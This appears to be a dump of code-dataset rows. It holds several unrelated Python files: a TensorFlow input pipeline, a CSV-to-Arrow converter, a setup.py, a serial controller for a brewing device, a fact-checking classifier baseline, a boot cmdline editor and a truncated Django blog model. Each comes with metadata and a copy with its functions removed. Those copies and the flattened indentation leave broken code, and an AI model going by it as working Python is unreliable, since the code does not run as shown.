# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import copy
import random
import codecs
import pickle
import functools
import tensorflow as tf
tf.enable_eager_execution()
import config
load_dict()
# function for converting string to idx
convert_vocab_idx = lambda string : [vocab_idx[v] if v in vocab_idx else vocab_idx['<unk>'] \
for v in string.split(' ')]
# padding
padding_func = lambda data, max_length : data + [vocab_idx['<padding>'] \
for _ in range(max_length - len(data))]
padding_func_with_args = functools.partial(padding_func, max_length=config.eann_config.max_length)
@input_fn
@input_fn
if __name__ == '__main__':
for datas in train_input_fn(config.TRAIN_DATA_PATH, 10):
print(datas[1]['label'])
print(datas[1]['event'])
input() | 32.83871 | 98 | 0.668959 | # coding:utf-8
# Produced by Jiaxin Zhang
# Start Data: 20_May_2020
# Data processing module.
#
# For GOD I Trust.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import copy
import random
import codecs
import pickle
import functools
import tensorflow as tf
tf.enable_eager_execution()
import config
def load_dict():
global vocab_idx
with codecs.open(config.VOCAB_PATH, 'rb') as file:
vocab_idx = pickle.load(file)
load_dict()
def create_batch_idx(data_length, batch_size):
batch_number = data_length // batch_size
batch_number = batch_number if data_length % batch_size == 0 else batch_number + 1
for i in range(batch_number):
yield (i * batch_size, i * batch_size + batch_size)
# function for converting string to idx
convert_vocab_idx = lambda string : [vocab_idx[v] if v in vocab_idx else vocab_idx['<unk>'] \
for v in string.split(' ')]
# padding
padding_func = lambda data, max_length : data + [vocab_idx['<padding>'] \
for _ in range(max_length - len(data))]
padding_func_with_args = functools.partial(padding_func, max_length=config.eann_config.max_length)
def data_generator(data_path):
# load the data
with codecs.open(data_path, 'rb') as file:
datas = pickle.load(file)
# shuffle the data
datas = copy.deepcopy(datas)
random.shuffle(datas)
# generate batch data
batch_size = config.BATCH_SIZE
for (start, end) in create_batch_idx(len(datas), batch_size):
data_batch = datas[start : end]
text = [data[0] for data in data_batch]
image = [data[1] for data in data_batch]
label = [data[2] for data in data_batch]
event = [data[3] for data in data_batch]
# convert string to idx and paddinng
text_idx = list(map(convert_vocab_idx, text))
text_idx_padded = list(map(padding_func_with_args, text_idx))
features = {'input_text': text_idx_padded,
'input_image': image}
tags = {'label': label,
'event': event}
yield(features, tags)
def input_fn(func):
@functools.wraps(func)
def input_fn(data_path, steps):
output_types = {'input_text': tf.int32,
'input_image': tf.float32}
output_shapes = {'input_text': [None, None],
'input_image': [None, None, None, 3]}
tag_types = {'label': tf.int32,
'event': tf.int32}
tag_shapes = {'label': [None],
'event': [None]}
data_generator_with_path = functools.partial(data_generator, data_path=data_path)
dataset = tf.data.Dataset.from_generator(
data_generator_with_path,
output_types=(output_types, tag_types),
output_shapes=(output_shapes, tag_shapes))
dataset = dataset.repeat(steps)
return dataset
return input_fn
@input_fn
def train_input_fn():
pass
@input_fn
def eval_input_fn():
pass
def server_input_fn():
input_text = tf.placeholder(tf.int32, shape=[None, None], name='input_text')
input_image = tf.placeholder(tf.float32, shape=[None, None, None, 3], name='input_image')
receive_tensor = {'input_text': input_text,
'input_image': input_image}
features = {'input_text': input_text,
'input_image': input_image}
return tf.estimator.export.ServingInputReceiver(features, receive_tensor)
if __name__ == '__main__':
for datas in train_input_fn(config.TRAIN_DATA_PATH, 10):
print(datas[1]['label'])
print(datas[1]['event'])
input() | 2,371 | 0 | 159 |
4fb586103fe0edef0a4a7e8014f40d0dfc525a60 | 879 | py | Python | example/org2/csv2feather.py | public-tatsuya-noyori/meteorological_visualizer | 0566c74a1a0465f7a78ea57788a6f52357672d2c | [
"Apache-2.0"
] | 1 | 2021-01-05T09:44:30.000Z | 2021-01-05T09:44:30.000Z | example/org2/csv2feather.py | public-tatsuya-noyori/meteorological_visualizer | 0566c74a1a0465f7a78ea57788a6f52357672d2c | [
"Apache-2.0"
] | 11 | 2020-08-05T05:51:32.000Z | 2022-01-12T23:48:27.000Z | example/org2/csv2feather.py | public-tatsuya-noyori/meteorological_visualizer | 0566c74a1a0465f7a78ea57788a6f52357672d2c | [
"Apache-2.0"
] | 3 | 2020-08-04T23:26:49.000Z | 2020-08-14T07:01:06.000Z | #!/usr/bin/env python3
import os
import re
import sys
import pandas as pd
import pyarrow as pa
from pyarrow import csv, feather
in_file = sys.argv[1]
in_df = csv.read_csv(in_file).to_pandas()
if 'datetime' in in_df.columns.values.tolist():
in_df['datetime'] = pd.to_datetime(in_df.datetime, utc=True)
#out_file = re.sub(r'\.csv$', '.feather', os.path.basename(in_file))
out_file = re.sub(r'\.csv$', '.arrow', os.path.basename(in_file))
with open(out_file, 'bw') as out_f:
#feather.write_feather(pa.Table.from_pandas(csv.read_csv(in_file).to_pandas()), out_f, compression='zstd', compression_level=15)
feather.write_feather(pa.Table.from_pandas(csv.read_csv(in_file).to_pandas().astype({'viewerIndex': 'int32'}).astype({'size': 'int32'}).astype({'gridSize': 'int32'})), out_f, compression='uncompressed')
os.system("gzip {}".format(out_file))
print(out_file + '.gz')
| 43.95 | 206 | 0.724687 | #!/usr/bin/env python3
import os
import re
import sys
import pandas as pd
import pyarrow as pa
from pyarrow import csv, feather
in_file = sys.argv[1]
in_df = csv.read_csv(in_file).to_pandas()
if 'datetime' in in_df.columns.values.tolist():
in_df['datetime'] = pd.to_datetime(in_df.datetime, utc=True)
#out_file = re.sub(r'\.csv$', '.feather', os.path.basename(in_file))
out_file = re.sub(r'\.csv$', '.arrow', os.path.basename(in_file))
with open(out_file, 'bw') as out_f:
#feather.write_feather(pa.Table.from_pandas(csv.read_csv(in_file).to_pandas()), out_f, compression='zstd', compression_level=15)
feather.write_feather(pa.Table.from_pandas(csv.read_csv(in_file).to_pandas().astype({'viewerIndex': 'int32'}).astype({'size': 'int32'}).astype({'gridSize': 'int32'})), out_f, compression='uncompressed')
os.system("gzip {}".format(out_file))
print(out_file + '.gz')
| 0 | 0 | 0 |
95c237b16aac2282ed9e9b22d2258e0297ce9922 | 554 | py | Python | setup.py | Tatersic/Vnode | 8ec7009517f6ac9441ac9352e6dbc08e16cc3402 | [
"MIT"
] | null | null | null | setup.py | Tatersic/Vnode | 8ec7009517f6ac9441ac9352e6dbc08e16cc3402 | [
"MIT"
] | null | null | null | setup.py | Tatersic/Vnode | 8ec7009517f6ac9441ac9352e6dbc08e16cc3402 | [
"MIT"
] | null | null | null | from setuptools import setup
setup(
name="Vnode",
version="0.1.0",
description="A fast wheel to build a node network.",
author="Tatersic&Ovizro",
author_email="Tatersic@qq.com",
maintainer="Ovizro",
maintainer_email="Ovizro@hypercol.com",
license="MIT",
url="https://github.com/Tatersic/Vnode",
download_url="https://github.com/Tatersic/Vnode/archive/refs/heads/master.zip",
packages=["vnode"],
requires=["aiohttp"],
python_requires=">=3.8",
exclude_package_data={
'':['test.*']
}
) | 24.086957 | 83 | 0.642599 | from setuptools import setup
setup(
name="Vnode",
version="0.1.0",
description="A fast wheel to build a node network.",
author="Tatersic&Ovizro",
author_email="Tatersic@qq.com",
maintainer="Ovizro",
maintainer_email="Ovizro@hypercol.com",
license="MIT",
url="https://github.com/Tatersic/Vnode",
download_url="https://github.com/Tatersic/Vnode/archive/refs/heads/master.zip",
packages=["vnode"],
requires=["aiohttp"],
python_requires=">=3.8",
exclude_package_data={
'':['test.*']
}
) | 0 | 0 | 0 |
96cfc389cb065e1c9dd412436628111f89e39294 | 4,563 | py | Python | brewmeister/controller/brewslave.py | brewpeople/brewmeister | 82a5402a3cd528892b13d2a8b7a58d6c15e4ae9f | [
"MIT"
] | 2 | 2018-12-30T17:55:54.000Z | 2022-03-03T20:24:57.000Z | brewmeister/controller/brewslave.py | brewpeople/brewmeister | 82a5402a3cd528892b13d2a8b7a58d6c15e4ae9f | [
"MIT"
] | null | null | null | brewmeister/controller/brewslave.py | brewpeople/brewmeister | 82a5402a3cd528892b13d2a8b7a58d6c15e4ae9f | [
"MIT"
] | null | null | null | import os
import re
import time
import struct
import serial
import threading
import crcmod
COMMAND_GET = struct.pack('B', 0xf0)
COMMAND_SET = struct.pack('B', 0xf1)
DS18B20 = struct.pack('B', 0xf1)
HEATER = struct.pack('B', 0xf2)
STIRRER = struct.pack('B', 0xf3)
# Contrary to crcmod's definition, brewslave expects a bit-reversed CRC
crc8 = crcmod.mkCrcFun(0x131, 0, False, 0)
| 28.879747 | 91 | 0.586895 | import os
import re
import time
import struct
import serial
import threading
import crcmod
COMMAND_GET = struct.pack('B', 0xf0)
COMMAND_SET = struct.pack('B', 0xf1)
DS18B20 = struct.pack('B', 0xf1)
HEATER = struct.pack('B', 0xf2)
STIRRER = struct.pack('B', 0xf3)
# Contrary to crcmod's definition, brewslave expects a bit-reversed CRC
crc8 = crcmod.mkCrcFun(0x131, 0, False, 0)
class Brewslave(object):
def __init__(self, app):
device = None
for x in os.listdir('/dev'):
if re.match(r"tty(ACM.|USB.|\.usbserial.*|\.usbmodem.*)", x):
device = os.path.join('/dev', x)
break
self.app = app
self.conn = serial.Serial(device, timeout=2, baudrate=115200)
self._lock = threading.Lock()
self._heating = False
self._stirring = False
self._target = self._read_temperature()
def _send_packet(self, command, device, payload_fmt=None, *payload):
if not payload:
packet = struct.pack('ssBBBB', command, device, 0, 0, 0, 0)
else:
packet = struct.pack('ss{}'.format(payload_fmt), command, device, *payload)
checksum = struct.pack('B', crc8(packet))
self.conn.write(packet)
self.conn.write(checksum)
def _write_checked(self, device, payload_fmt, *payload):
if self.connected:
try:
self._lock.acquire()
self._send_packet(COMMAND_SET, device, payload_fmt, *payload)
# Read ack byte
self.conn.read(1)
finally:
self._lock.release()
else:
raise IOError("Not connected")
def _read_checked(self, device, num_bytes=7):
if not self.connected:
raise IOError("Not connected")
try:
self._lock.acquire()
self._send_packet(COMMAND_GET, device)
data = self.conn.read(num_bytes)
if not data:
raise IOError("Received no data")
if len(data) != num_bytes:
raise IOError("Received {} != {} bytes".format(len(data), num_bytes))
checksum = struct.unpack('B', data[6])[0]
expected = crc8(data[:6])
if checksum != expected:
raise IOError("Checksum {} does not match {}".format(checksum, expected))
return data
finally:
self._lock.release()
def _read_boolean(self, device):
data = self._read_checked(device)
received_device, result = struct.unpack('BB', data[0:2])
return result != 0
def _read_float(self, device):
data = self._read_checked(device)
received_device, status = struct.unpack('BB', data[0:2])
result = struct.unpack('f', data[2:6])[0]
return result
def _write_boolean(self, device, value):
self._write_checked(device, '?BBB', value, 0, 0, 0)
def _write_float(self, device, value):
self._write_checked(device, 'f', value)
def _read_temperature(self):
try:
return self._read_float(DS18B20)
except serial.SerialException as exception:
self.app.logger.warning("Serial connection problem: {}".format(str(exception)))
except IOError as exception:
self.app.logger.warning("temperature: {}".format(str(exception)))
@property
def temperature(self):
return self._read_temperature()
@property
def target(self):
return self._target
@target.setter
def target(self, temperature):
self._target = temperature
is_set = False
while not is_set:
try:
self._write_float(DS18B20, temperature)
is_set = True
except IOError:
# TODO: this is unbounded!
time.sleep(0.5)
@property
def heating(self):
try:
self._heating = self._read_boolean(HEATER)
except IOError as exception:
self.app.logger.warning("heating: {}".format(str(exception)))
return self._heating
@heating.setter
def heating(self, value):
self._write_boolean(HEATER, value)
@property
def stirring(self):
try:
self._stirring = self._read_boolean(STIRRER)
except IOError as exception:
self.app.logger.warning("stirring: {}".format(str(exception)))
return self._stirring
@stirring.setter
def stirring(self, value):
self._write_boolean(STIRRER, value)
| 3,605 | 551 | 23 |
0a0c322c09dddecb6ae9edbae2255b2eba9732ab | 9,279 | py | Python | 5_fact_checking_models/baseline.py | olibchr/factChecker | 6affa8636884e1198eff8a9e360ad376f511e37d | [
"MIT"
] | 1 | 2018-06-23T20:40:41.000Z | 2018-06-23T20:40:41.000Z | 5_fact_checking_models/baseline.py | olibchr/factChecker | 6affa8636884e1198eff8a9e360ad376f511e37d | [
"MIT"
] | 1 | 2021-12-13T19:47:10.000Z | 2021-12-13T19:47:10.000Z | 5_fact_checking_models/baseline.py | olibchr/factChecker | 6affa8636884e1198eff8a9e360ad376f511e37d | [
"MIT"
] | null | null | null | import glob, os, sys, json, datetime
import pandas as pd
import numpy as np
sys.path.insert(0, os.path.dirname(__file__) + '../2_helpers')
import re, nltk
from dateutil import parser
from Fact import Fact
from User import User
from Transaction import Transaction
from decoder import decoder
from sklearn.model_selection import train_test_split
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn import metrics
from sklearn.linear_model import Perceptron
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import RidgeClassifier
from matplotlib import pyplot as plt
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import Imputer
import warnings
import scipy.stats
from collections import Counter
warnings.filterwarnings("ignore", category=DeprecationWarning)
SERVER_RUN = True
DIR = os.path.dirname(__file__) + '../../3_Data/'
if __name__ == "__main__":
main()
| 40.519651 | 132 | 0.682186 | import glob, os, sys, json, datetime
import pandas as pd
import numpy as np
sys.path.insert(0, os.path.dirname(__file__) + '../2_helpers')
import re, nltk
from dateutil import parser
from Fact import Fact
from User import User
from Transaction import Transaction
from decoder import decoder
from sklearn.model_selection import train_test_split
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn import metrics
from sklearn.linear_model import Perceptron
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import RidgeClassifier
from matplotlib import pyplot as plt
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import Imputer
import warnings
import scipy.stats
from collections import Counter
warnings.filterwarnings("ignore", category=DeprecationWarning)
SERVER_RUN = True
DIR = os.path.dirname(__file__) + '../../3_Data/'
def datetime_converter(o):
if isinstance(o, datetime):
return o.__str__()
def get_data():
fact_file = glob.glob(DIR + 'facts.json')[0]
transactions_file = glob.glob(DIR + 'factTransaction.json')[0]
facts = json.load(open(fact_file), object_hook=decoder)
transactions = pd.read_json(transactions_file)
return facts, transactions
def get_users():
user_files = glob.glob(DIR + 'user_tweets/' + 'user_*.json')
print('Found {} users'.format(len(user_files)))
if SERVER_RUN:
user_files = sorted(user_files, reverse=False)
else:
user_files = sorted(user_files, reverse=True)
if len(user_files) < 10: print('WRONG DIR?')
for user_file in user_files:
user = json.loads(open(user_file).readline(), object_hook=decoder)
yield user
def write_user(user):
print("Writing user: {}".format(user.user_id))
with open(DIR + 'user_tweets/' + 'user_' + str(user.user_id) + '.json', 'w') as out_file:
out_file.write(json.dumps(user.__dict__, default=datetime_converter) + '\n')
def time_til_retweet(users, df_transactions, facts):
avg_min_to_retweet_per_user = {user.user_id: user.avg_time_to_retweet for user in users if user.avg_time_to_retweet is not None}
avg_sent_per_user = {user.sent_tweets_avg: user.sent_tweets_avg for user in users if user.sent_tweets_avg is not None}
print(avg_sent_per_user)
hist_all, bins = np.histogram(list(avg_min_to_retweet_per_user.values()))
print(hist_all, bins)
# plt.figure()
# plt.hist(list(avg_min_to_retweet_per_user.values()), bins=bins)
# # plt.show()
# plt.figure()
# plt.hist(list(retweet_mins_pos.values()), bins=bins)
# # plt.show()
# plt.figure()
# plt.hist(list(retweet_mins_neg.values()), bins=bins)
# # plt.show()
X = []
y = []
df_transactions['time_til_retweet'] = df_transactions['user_id'].map(
lambda uid: avg_min_to_retweet_per_user[uid] if uid in avg_min_to_retweet_per_user else np.nan)
df_transactions['user_sent'] = df_transactions['user_id'].map(
lambda uid: avg_sent_per_user[uid] if uid in avg_sent_per_user else np.nan)
df_transactions.dropna(subset=['time_til_retweet'], inplace=True)
#df_transactions.dropna(subset=['user_sent'], inplace=True)
df_grouped_transactions = df_transactions.groupby(['fact'])
for tr_group in df_grouped_transactions:
df_tr_g = tr_group[1]
#hist = np.histogram(df_tr_g['time_til_retweet'], bins=bins)
#print(df_tr_g['time_til_retweet'])
indices = ~np.isnan(df_tr_g['time_til_retweet'])
# print(indices)
#if len(indices) == 0 or df_tr_g['time_til_retweet'][indices].shape[0] == 0: continue
time_til_retweet_avg = np.average(df_tr_g['time_til_retweet'][indices])
time_til_retweet_var = np.var(df_tr_g['time_til_retweet'][indices])
time_til_retweet_mode = np.asarray(scipy.stats.mode(df_tr_g['time_til_retweet'][indices]))[0][0]
fact = [fact for fact in facts if fact.hash == tr_group[0]][0]
if fact.true == '0' or fact.true == 0:
y.append(0)
elif fact.true == '1' or fact.true == 1:
y.append(1)
else:
continue
y.append(-1)
X.append(np.asarray([time_til_retweet_avg, time_til_retweet_var, time_til_retweet_mode]))
classifier = evaluation(X, y)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
clf = Perceptron(n_iter=50)
clf.fit(X_train, y_train)
pred = clf.predict(X_test)
match = [1 if t == p else 0 for t, p in zip(y_test, pred)]
score = metrics.accuracy_score(y_test, pred)
print(score)
print(len(X), len(X_train), len(X_test))
corclassified_group_pos = np.asarray([hist for hist, m, y in zip(X_test, match, y_test) if m == 1 and y == 1])
corclassified_group_neg = np.asarray([hist for hist, m, y in zip(X_test, match, y_test) if m == 1 and y == 0])
corclassified_group_unk = np.asarray([hist for hist, m, y in zip(X_test, match, y_test) if m == 1 and y == -1])
misclassified_group_pos = np.asarray([hist for hist, m, y in zip(X_test, match, y_test) if m == 0 and y == 1])
misclassified_group_neg = np.asarray([hist for hist, m, y in zip(X_test, match, y_test) if m == 0 and y == 0])
misclassified_group_unk = np.asarray([hist for hist, m, y in zip(X_test, match, y_test) if m == 0 and y == -1])
corclass_pos_avg = corclassified_group_pos.mean(0)
corclass_neg_avg = corclassified_group_neg.mean(0)
corclass_unk_avg = corclassified_group_unk.mean(0)
misclass_pos_avg = misclassified_group_pos.mean(0)
misclass_neg_avg = misclassified_group_neg.mean(0)
misclass_unk_avg = misclassified_group_unk.mean(0)
print(corclassified_group_pos)
print(corclassified_group_neg)
print(corclassified_group_unk)
print(misclassified_group_pos)
print(misclassified_group_neg)
print(misclassified_group_unk)
fig, axes = plt.subplots(2, 3)
axes[0, 0].bar(bins[:-1], corclass_pos_avg, width=np.diff(bins), ec="k", align="edge")
axes[0, 0].set_title('Correct classified where fact was true')
axes[0, 1].bar(bins[:-1], corclass_neg_avg, width=np.diff(bins), ec="k", align="edge")
axes[0, 1].set_title('Correct classified where fact was false')
axes[0, 2].bar(bins[:-1], corclass_unk_avg, width=np.diff(bins), ec="k", align="edge")
axes[0, 2].set_title('Correct classified where fact was unknown')
axes[1, 0].bar(bins[:-1], misclass_pos_avg, width=np.diff(bins), ec="r", align="edge")
axes[1, 0].set_title('Incorrect classified where fact was true')
axes[1, 1].bar(bins[:-1], misclass_neg_avg, width=np.diff(bins), ec="r", align="edge")
axes[1, 1].set_title('Incorrect classified where fact was false')
axes[1, 2].bar(bins[:-1], misclass_unk_avg, width=np.diff(bins), ec="r", align="edge")
axes[1, 2].set_title('Incorrect classified where fact was unknown')
#plt.show()
return df_transactions
def evaluation(X, y):
def benchmark(clf):
# print('_' * 80)
# print("Training: ")
# print(clf)
clf.fit(X_train_imp, y_train)
pred = clf.predict(X_test_imp)
scores = cross_val_score(clf, X_test_imp, y_test, cv=5)
score = metrics.accuracy_score(y_test, pred)
# print("accuracy: %0.3f" % score)
print("Cross validated Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
return scores.mean()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
imp = Imputer(missing_values='NaN', strategy='mean', axis=0)
imp = imp.fit(X_train)
X_train_imp = imp.transform(X_train)
X_test_imp = imp.transform(X_test)
results = []
for clf, name in (
(RidgeClassifier(tol=1e-2, solver="lsqr"), "Ridge Classifier"),
(Perceptron(n_iter=50), "Perceptron"),
(PassiveAggressiveClassifier(n_iter=50), "Passive-Aggressive"),
(KNeighborsClassifier(n_neighbors=10), "kNN"),
(RandomForestClassifier(n_estimators=100), "Random forest"),
(MultinomialNB(alpha=.01), "Multinomial NB"),
(BernoulliNB(alpha=.01), "Bernoulli NB")):
print('=' * 80)
print(name)
results.append([benchmark(clf), clf])
# Train sparse Naive Bayes classifiers
for penalty in ["l2", "l1"]:
print("%s penalty" % penalty.upper())
for clf, name in (
(LinearSVC(penalty=penalty, dual=False, tol=1e-3), "Linear SVM"),
(SGDClassifier(alpha=.0001, n_iter=50, penalty=penalty), "SGDC")):
print('=' * 80)
results.append([benchmark(clf), clf])
return results[np.argmax(np.asarray(results)[:, 0])]
def main():
facts, df_transactions = get_data()
users = get_users()
# feature: histogram of avg time of retweet per user. Each user is one count in the histogram. Each rumor has one histogram.
# Prediction with this feature: ~.6 acc, high variance
df_transactions = time_til_retweet(users, df_transactions, facts)
if __name__ == "__main__":
main()
| 7,967 | 0 | 161 |
60a87abbd5f60963f9b1b9f17741e1be53d9ef5b | 2,842 | py | Python | pibootcmdline/edit.py | urbas/pibootcmdline | dcfbc6e6075f11e1aea928452acca59528902235 | [
"MIT"
] | 1 | 2017-10-24T23:19:06.000Z | 2017-10-24T23:19:06.000Z | pibootcmdline/edit.py | urbas/pibootcmdline | dcfbc6e6075f11e1aea928452acca59528902235 | [
"MIT"
] | 67 | 2017-11-15T23:20:13.000Z | 2019-03-13T14:57:59.000Z | pibootcmdline/edit.py | urbas/pibootcmdline | dcfbc6e6075f11e1aea928452acca59528902235 | [
"MIT"
] | null | null | null | from pibootcmdline.parse import parse_parameter, Parameter
def add_parameters(cmdline, *parameters):
"""
Parameters
----------
cmdline: list[Parameter]
parsed command line to which to add parameters.
*parameters: str
list of string parameters. For example: 'key=value' or 'key' or 'key=value1,value2'.
Returns
-------
list[Parameter]
the cmdline now also containing the added parameters.
"""
return cmdline + [parse_parameter(parameter) for parameter in parameters]
def set_parameters(cmdline, *parameters):
"""
Parameters
----------
cmdline: list[Parameter]
parsed command line to which to add parameters.
*parameters: str
list of string parameters. For example: 'key=value' or 'key' or 'key=value1,value2'.
Returns
-------
list[Parameter]
the cmdline with changed or added parameters.
"""
new_params = [parse_parameter(param) for param in parameters]
new_cmdline = [_set_value(to_param, new_params) for to_param in cmdline]
for new_param in new_params:
if _index_of_key(new_cmdline, new_param.key) is None:
new_cmdline.append(new_param)
return new_cmdline
def add_to_value(cmdline, *parameters):
"""
This function will append comma-separated values to already existing values of a particular parameter.
For example, if the command line already contains the parameter ``modules-load=dwc2`` and you call `
`add-list-value modules-load=g_ether`` then the resulting command line will contain ``modules-load=dwc2,g_ether``.
Parameters
----------
cmdline: list[Parameter]
parsed command line to which to add parameters.
parameters: str
list of string parameters. For example: 'key=value' or 'key' or 'key=value1,value2'.
Returns
-------
list[Parameter]
the cmdline now also containing the added parameters.
"""
from_params = [parse_parameter(param) for param in parameters]
new_cmdline = [_add_to_value(to_param, from_params) for to_param in cmdline]
for from_param in from_params:
if _index_of_key(new_cmdline, from_param.key) is None:
new_cmdline.append(from_param)
return new_cmdline
| 30.55914 | 118 | 0.674525 | from pibootcmdline.parse import parse_parameter, Parameter
def add_parameters(cmdline, *parameters):
"""
Parameters
----------
cmdline: list[Parameter]
parsed command line to which to add parameters.
*parameters: str
list of string parameters. For example: 'key=value' or 'key' or 'key=value1,value2'.
Returns
-------
list[Parameter]
the cmdline now also containing the added parameters.
"""
return cmdline + [parse_parameter(parameter) for parameter in parameters]
def set_parameters(cmdline, *parameters):
"""
Parameters
----------
cmdline: list[Parameter]
parsed command line to which to add parameters.
*parameters: str
list of string parameters. For example: 'key=value' or 'key' or 'key=value1,value2'.
Returns
-------
list[Parameter]
the cmdline with changed or added parameters.
"""
new_params = [parse_parameter(param) for param in parameters]
new_cmdline = [_set_value(to_param, new_params) for to_param in cmdline]
for new_param in new_params:
if _index_of_key(new_cmdline, new_param.key) is None:
new_cmdline.append(new_param)
return new_cmdline
def add_to_value(cmdline, *parameters):
"""
This function will append comma-separated values to already existing values of a particular parameter.
For example, if the command line already contains the parameter ``modules-load=dwc2`` and you call `
`add-list-value modules-load=g_ether`` then the resulting command line will contain ``modules-load=dwc2,g_ether``.
Parameters
----------
cmdline: list[Parameter]
parsed command line to which to add parameters.
parameters: str
list of string parameters. For example: 'key=value' or 'key' or 'key=value1,value2'.
Returns
-------
list[Parameter]
the cmdline now also containing the added parameters.
"""
from_params = [parse_parameter(param) for param in parameters]
new_cmdline = [_add_to_value(to_param, from_params) for to_param in cmdline]
for from_param in from_params:
if _index_of_key(new_cmdline, from_param.key) is None:
new_cmdline.append(from_param)
return new_cmdline
def _set_value(param, new_params):
new_param = param
for to_param in new_params:
if param.key == to_param.key:
new_param = to_param
return new_param
def _add_to_value(to_param, from_params):
new_param = to_param
for from_param in from_params:
if to_param.key == from_param.key:
new_param = Parameter(to_param.key, new_param.values + from_param.values)
return new_param
def _index_of_key(cmdline, key):
for i, param in enumerate(cmdline):
if param.key == key:
return i
return None
| 506 | 0 | 69 |
99d083833cac96b1bde1dff2f41c31a0e099602f | 2,975 | py | Python | crownstone_uart/core/uart/UartTypes.py | RicArch97/crownstone-lib-python-uart | c0aaf1415936e5e622aa6395fdac4f88ebcf82bf | [
"MIT"
] | null | null | null | crownstone_uart/core/uart/UartTypes.py | RicArch97/crownstone-lib-python-uart | c0aaf1415936e5e622aa6395fdac4f88ebcf82bf | [
"MIT"
] | null | null | null | crownstone_uart/core/uart/UartTypes.py | RicArch97/crownstone-lib-python-uart | c0aaf1415936e5e622aa6395fdac4f88ebcf82bf | [
"MIT"
] | null | null | null | from enum import IntEnum | 32.692308 | 41 | 0.526387 | from enum import IntEnum
class UartMessageType(IntEnum):
UART_MESSAGE = 0
ENCRYPTED_UART_MESSAGE = 128
class UartTxType(IntEnum):
HELLO = 0
SESSION_NONCE = 1
HEARTBEAT = 2
STATUS = 3
GET_MAC_ADDRESS = 4
CONTROL = 10
HUB_DATA_REPLY = 11
ENABLE_ADVERTISEMENT = 50000
ENABLE_MESH = 50001
GET_CROWNSTONE_ID = 50002
ADC_CONFIG_INC_RANGE_CURRENT = 50103
ADC_CONFIG_DEC_RANGE_CURRENT = 50104
ADC_CONFIG_INC_RANGE_VOLTAGE = 50105
ADC_CONFIG_DEC_RANGE_VOLTAGE = 50106
ADC_CONFIG_DIFFERENTIAL_CURRENT = 50108
ADC_CONFIG_DIFFERENTIAL_VOLTAGE = 50109
ADC_CONFIG_VOLTAGE_PIN = 50110
POWER_LOG_CURRENT = 50200
POWER_LOG_VOLTAGE = 50201
POWER_LOG_FILTERED_CURRENT = 50202
POWER_LOG_CALCULATED_POWER = 50204
MOCK_INTERNAL_EVT = 60000
UNKNOWN = 65535
class UartRxType(IntEnum):
HELLO = 0
SESSION_NONCE = 1
HEARTBEAT = 2
STATUS = 3
MAC_ADDRESS = 4
RESULT_PACKET = 10
ERR_REPLY_PARSING_FAILED = 9900
ERR_REPLY_STATUS = 9901
ERR_REPLY_SESSION_NONCE_MISSING = 9902
ERR_REPLY_DECRYPTION_FAILED = 9903
UART_MESSAGE = 10000
SESSION_NONCE_MISSING = 10001
OWN_SERVICE_DATA = 10002
PRESENCE_CHANGE = 10004
FACTORY_RESET = 10005
BOOTED = 10006
HUB_DATA = 10007
MESH_SERVICE_DATA = 10102
EXTERNAL_STATE_PART_0 = 10103
EXTERNAL_STATE_PART_1 = 10104
MESH_RESULT = 10105
MESH_ACK_ALL_RESULT = 10106
RSSI_PING_MESSAGE = 10107
LOG = 10200
LOG_ARRAY = 10201
INTERNAL_EVENT = 40000
MESH_CMD_TIME = 40103
MESH_PROFILE_LOCATION = 40110
MESH_SET_BEHAVIOUR_SETTINGS = 40111
MESH_TRACKED_DEVICE_REGISTER = 40112
MESH_TRACKED_DEVICE_TOKEN = 40113
MESH_SYNC_REQUEST = 40114
MESH_TRACKED_DEVICE_HEARTBEAT = 40120
ADVERTISING_ENABLED = 50000
MESH_ENABLED = 50001
CROWNSTONE_ID = 50002
ADC_CONFIG = 50100
ADC_RESTART = 50101
POWER_LOG_CURRENT = 50200
POWER_LOG_VOLTAGE = 50201
POWER_LOG_FILTERED_CURRENT = 50202
POWER_LOG_FILTERED_VOLTAGE = 50203
POWER_LOG_POWER = 50204
ASCII_LOG = 60000
FIRMWARESTATE = 60001 | 0 | 2,882 | 69 |
23850c7a34a4aab5658c4264bf067ad13c196feb | 2,270 | py | Python | tumblog/models/post.py | lygaret-attic/django-tumblog | 46ad86d7daf7ca7468d7bd554407479e449207a9 | [
"BSD-3-Clause"
] | 1 | 2021-01-08T19:07:29.000Z | 2021-01-08T19:07:29.000Z | tumblog/models/post.py | lygaret-attic/django-tumblog | 46ad86d7daf7ca7468d7bd554407479e449207a9 | [
"BSD-3-Clause"
] | null | null | null | tumblog/models/post.py | lygaret-attic/django-tumblog | 46ad86d7daf7ca7468d7bd554407479e449207a9 | [
"BSD-3-Clause"
] | null | null | null | from django.db import models
from django.db.models import permalink
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from datetime import datetime
from tagging.models import Tag
from tagging.fields import TagField
from autofields.fields import AutoSlugField
from tumblog.managers import PublishedPostManager
from tumblog.models import Blog
class Post(models.Model):
""" Tumblog Post Model """
title = models.CharField(max_length = 200)
author = models.ForeignKey(User, blank=True, null=True)
